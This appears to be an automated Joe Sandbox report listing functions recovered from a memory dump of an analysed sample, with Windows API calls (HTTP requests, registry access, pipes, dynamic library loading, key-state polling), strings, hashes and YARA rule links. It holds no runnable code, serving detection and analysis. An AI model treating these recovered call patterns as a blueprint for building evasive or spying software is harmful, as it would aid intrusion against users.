String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: c5114ec409ad975df4ae52baca84a47ab943134894102a35057efcc21f4bda1c
Instruction ID: 91b66d023c8ffdf6ac47a2a76f964bd4afbd8c5baf4d141197d8c2226fd48e76
Opcode Fuzzy Hash: c5114ec409ad975df4ae52baca84a47ab943134894102a35057efcc21f4bda1c
Instruction Fuzzy Hash: F421F071A05208BEEF14ABB5DC86DFFB76ADF05360B04812DF429972E0DB39580AD614

Function 0070182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0070184C
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00701872
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 007018A2
InternetCloseHandle.WININET(00000000), ref: 007018E9

Part of subcall function 00702483: GetLastError.KERNEL32(?,?,00701817,00000000,00000000,00000001), ref: 00702498
Part of subcall function 00702483: SetEvent.KERNEL32(?,?,00701817,00000000,00000000,00000001), ref: 007024AD

Strings

, xrefs: 00701893

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 637b9181e0fe37fdc470de3d197fce7ea9cec3bc1974f654f79306f0371c5326
Instruction ID: 938c35a481622bc1c42d536114d41d573ef77f86c69aa42e196f86592eca438b
Opcode Fuzzy Hash: 637b9181e0fe37fdc470de3d197fce7ea9cec3bc1974f654f79306f0371c5326
Instruction Fuzzy Hash: 192180B1500308FFEB119F64DC89EBF77EDEB48764F50822AF505962C0DA289E0597A5

Function 007163E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00691D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00691D73
Part of subcall function 00691D35: GetStockObject.GDI32(00000011), ref: 00691D87
Part of subcall function 00691D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00691D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00716461
LoadLibraryW.KERNEL32(?), ref: 00716468
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0071647D
DestroyWindow.USER32(?), ref: 00716485

Strings

SysAnimate32, xrefs: 0071643C

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 2b44dbb6748478b4a73a6785dde267a6668d9f15e9493d9aa58cff51430b9be3
Instruction ID: 89194ac57f89edb45c13a82b1910445475b6f5d3f4eb19318b9222eeda32286b
Opcode Fuzzy Hash: 2b44dbb6748478b4a73a6785dde267a6668d9f15e9493d9aa58cff51430b9be3
Instruction Fuzzy Hash: 38218B71200245ABEF108FA8DC85EFB77ADEB59728F208629FA50920D0D779DC819760

Function 006F6D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 006F6DBC
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 006F6DEF
GetStdHandle.KERNEL32(0000000C), ref: 006F6E01
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 006F6E3B

Strings

nul, xrefs: 006F6E36

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: cd38b4e24218b13ea8507c49778782efdddbc0551f01b4bdb2ea50098db14b39
Instruction ID: 02eb1d4ddf2e79c670bdddb591543206557e59a4a52a3c8e2f0063287692575a
Opcode Fuzzy Hash: cd38b4e24218b13ea8507c49778782efdddbc0551f01b4bdb2ea50098db14b39
Instruction Fuzzy Hash: E821B27560020DABDB209F29DC05AEA77F6FF44720F208619FEA1D73D0D77098109B54

Function 006F6E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 006F6E89
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 006F6EBB
GetStdHandle.KERNEL32(000000F6), ref: 006F6ECC
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 006F6F06

Strings

nul, xrefs: 006F6F01

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: ee104b3a9f599abfc4407bce4c6a1e23e6ea3c021c9fa92e38c44e127e186939
Instruction ID: a3b0d9950a0b9fe5ac92262ad466746219a69dd5ff5f87c530cbc680c8074091
Opcode Fuzzy Hash: ee104b3a9f599abfc4407bce4c6a1e23e6ea3c021c9fa92e38c44e127e186939
Instruction Fuzzy Hash: 3721B07A60430D9BDB209F69DC04AFA77AAAF55724F204A19FEE0D33D0D770A841CB14

Function 006FAC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 006FAC54
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 006FACA8
__swprintf.LIBCMT ref: 006FACC1
SetErrorMode.KERNEL32(00000000,00000001,00000000,0071F910), ref: 006FACFF

Strings

%lu, xrefs: 006FACBB

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: f9986a3342c98339d55377363767fa2c36e097682f9a3070929b4d00f3b11da3
Instruction ID: a680481f0bb642f086886a17c0ed8760f23fd8f891c7464dadbe8881d72b61ee
Opcode Fuzzy Hash: f9986a3342c98339d55377363767fa2c36e097682f9a3070929b4d00f3b11da3
Instruction Fuzzy Hash: 6B216D70A0014DAFCB50EF69C945EEE7BB9EF49714B00806DF909AB252DA31EA41DB25

Function 006F1142 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,006EFCED,?,006F0D40,?,00008000), ref: 006F115F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,006EFCED,?,006F0D40,?,00008000), ref: 006F1184
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,006EFCED,?,006F0D40,?,00008000), ref: 006F118E
Sleep.KERNEL32(?,?,?,?,?,?,?,006EFCED,?,006F0D40,?,00008000), ref: 006F11C1

Strings

@o, xrefs: 006F119D

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID: @o
API String ID: 2875609808-3883423318
Opcode ID: 3a91f577219b2ab7c452a6a0f28d5903508c5eb1c20ac0abda6c8fd5817b9620
Instruction ID: 904161b19df96d407713dbf0ff86c23115a07955e8950d96230d4388170a08c6
Opcode Fuzzy Hash: 3a91f577219b2ab7c452a6a0f28d5903508c5eb1c20ac0abda6c8fd5817b9620
Instruction Fuzzy Hash: D4111C31D0051DE7CF00DFA5D9446FEBB79FB0A751F008165DB41B6280CB7455519B95

Function 006F1AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 006F1B19

Strings

REMOVE, xrefs: 006F1B1F
APPEND, xrefs: 006F1B52
EXISTS, xrefs: 006F1B41
KEYS, xrefs: 006F1B30

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: c264fc1f70cda2c886d521b77815dd7e3d1157184ece0268062832ee2258f3a2
Instruction ID: 9a9485ce129a174970d5bb2c4f4dd6d6ac2c10d9424ad531f3be1e831bf6adfc
Opcode Fuzzy Hash: c264fc1f70cda2c886d521b77815dd7e3d1157184ece0268062832ee2258f3a2
Instruction Fuzzy Hash: D3115E7091010DCFCF40EF64D8619FEB7B6FF26744B2484A9D8156B692EB325D06CB54

Function 0070EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0070EC07
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0070EC37
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0070ED6A
CloseHandle.KERNEL32(?), ref: 0070EDEB

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: e4cb0035691f87a0117f48cd93f15aa955cb3323e0a2d17c83ad651e66bc3c75
Instruction ID: ad00295b8214b431e2e39c266fa1d7534b3e1423149c7fb3b89902c512c3f65c
Opcode Fuzzy Hash: e4cb0035691f87a0117f48cd93f15aa955cb3323e0a2d17c83ad651e66bc3c75
Instruction Fuzzy Hash: 3E8160716047009FDB60EF28C886F2AB7EAEF85710F04891DF999DB6D2D674AC40CB95

Function 006B541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 006B547B
_memcpy_s.LIBCMT ref: 006B54ED
__read_nolock.LIBCMT ref: 006B554B
__filbuf.LIBCMT ref: 006B556E
_memset.LIBCMT ref: 006B55B2

Part of subcall function 006B8B28: __getptd_noexit.LIBCMT ref: 006B8B28

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
Instruction ID: 0d2d0d64ffd31a63ea2f740d2641a3298343e86765206d981d86435a0346f836
Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
Instruction Fuzzy Hash: 235190B1A00B05DBDB249E69D8807EE77A7AF40322F24872DF826962D1D7719ED18B40

Function 00710037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00697DE1: _memmove.LIBCMT ref: 00697E22

Part of subcall function 00710E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0070FDAD,?,?), ref: 00710E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007100FD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0071013C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00710183
RegCloseKey.ADVAPI32(?,?), ref: 007101AF
RegCloseKey.ADVAPI32(00000000), ref: 007101BC

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 1ed5edced4a6c57ef586f4ba6bb4c1e2b1587fa31c3b6e6282350ec7547d5dc6
Instruction ID: b81db293b0f369bcb1dca3f298abcb9ebd93c07d6bca92d721507ee7e2bedded
Opcode Fuzzy Hash: 1ed5edced4a6c57ef586f4ba6bb4c1e2b1587fa31c3b6e6282350ec7547d5dc6
Instruction Fuzzy Hash: AB516D71208204AFDB04EF68C881EAEB7E9FF84314F40891DF55587291DB75E984DB96

Function 0070D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00699837: __itow.LIBCMT ref: 00699862
Part of subcall function 00699837: __swprintf.LIBCMT ref: 006998AC

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0070D927
GetProcAddress.KERNEL32(00000000,?), ref: 0070D9AA
GetProcAddress.KERNEL32(00000000,00000000), ref: 0070D9C6
GetProcAddress.KERNEL32(00000000,?), ref: 0070DA07
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0070DA21

Part of subcall function 00695A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,006F7896,?,?,00000000), ref: 00695A2C
Part of subcall function 00695A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,006F7896,?,?,00000000,?,?), ref: 00695A50

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: b790f5bfe0d5a8540ce79ee6ef99add57d538108eaa6bc84cad3b0577133ccb2
Instruction ID: da0684e06d1e7ad857a743d675e0e38d1d2b22333370d4657e202472ea92ac3c
Opcode Fuzzy Hash: b790f5bfe0d5a8540ce79ee6ef99add57d538108eaa6bc84cad3b0577133ccb2
Instruction Fuzzy Hash: EF512575A00209DFCB50EFA8C4859ADB7F9FF09320B04C169E85AAB352DB35AD45CF94

Function 006FE571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 006FE61F
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 006FE648
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 006FE687

Part of subcall function 00699837: __itow.LIBCMT ref: 00699862
Part of subcall function 00699837: __swprintf.LIBCMT ref: 006998AC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 006FE6AC
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 006FE6B4

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: d57483b9dba42fb0566d0f0c7c7f8186426c95a7a076fe86bbed7dd22bfe7644
Instruction ID: 71775cdb0b98f75dc11f1e0a8f7dbe0b13896c8369b5844978aafcb3124c2002
Opcode Fuzzy Hash: d57483b9dba42fb0566d0f0c7c7f8186426c95a7a076fe86bbed7dd22bfe7644
Instruction Fuzzy Hash: 48511E35600109DFCF41DF68C9819ADBBFAFF09314B148469E909AB761DB31ED11CB64

Function 0071A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db2f2915c3b4d3ea9def9c3875abd13d3fb484da50f3af6af617be7e57830c9e
Instruction ID: e4e76ae071722c3ecacbabc491e7ceacdb4045aed5d4622aaa9ca4fda22619b7
Opcode Fuzzy Hash: db2f2915c3b4d3ea9def9c3875abd13d3fb484da50f3af6af617be7e57830c9e
Instruction Fuzzy Hash: 5241D035906208BFC721DB2CCC49FE9BBB9EB09320F144165E816A72E0D778AD81EA51

Function 00692344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00692357
ScreenToClient.USER32(007557B0,?), ref: 00692374
GetAsyncKeyState.USER32(00000001), ref: 00692399
GetAsyncKeyState.USER32(00000002), ref: 006923A7

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 78860724c21ce158cc4c0f957959a30ff6ca3c90152f428296e9988744aea648
Instruction ID: 22165d42bb53993bbc2bca4f547049b0f548df8f1e895e221bf353ddb5067cf7
Opcode Fuzzy Hash: 78860724c21ce158cc4c0f957959a30ff6ca3c90152f428296e9988744aea648
Instruction Fuzzy Hash: 3B415E3560411AFBDF159F68C844EF9BB7AFB05360F20835AF829922A0CB359D90DB91

Function 006E63AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006E63E7
TranslateAcceleratorW.USER32(?,?,?), ref: 006E6433
TranslateMessage.USER32(?), ref: 006E645C
DispatchMessageW.USER32(?), ref: 006E6466
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006E6475

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: 1c4c2c34fe8f8483fa565b2f4ab697dfa6cea600cdd590a1357d1c676cb108e0
Instruction ID: 94bd3f6eaad05a244c4c636269b66b8588e274e8bb8ebccf5e101df3f15cda6e
Opcode Fuzzy Hash: 1c4c2c34fe8f8483fa565b2f4ab697dfa6cea600cdd590a1357d1c676cb108e0
Instruction Fuzzy Hash: 7931F471501782DFDB60CFB5CC44BE67BEAAB20381F14C165F421C22E1E7699445CB64

Function 006E8A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 006E8A30
PostMessageW.USER32(?,00000201,00000001), ref: 006E8ADA
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 006E8AE2
PostMessageW.USER32(?,00000202,00000000), ref: 006E8AF0
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 006E8AF8

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 962663268c1e7db7808b4dc0a13f48552e4bdf7cf189b346e53c4e1205bba5c5
Instruction ID: 178f9b4315da45e053368a02b51cddb63639b38d8047839fcb9768e8c8c1c233
Opcode Fuzzy Hash: 962663268c1e7db7808b4dc0a13f48552e4bdf7cf189b346e53c4e1205bba5c5
Instruction Fuzzy Hash: 9031CB71500259EFDB14CFADD948ADE3BA6FB04315F10822AF928EB2D0CBB09910DB90

Function 006EB1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 006EB204
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 006EB221
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 006EB259
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 006EB27F
_wcsstr.LIBCMT ref: 006EB289

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
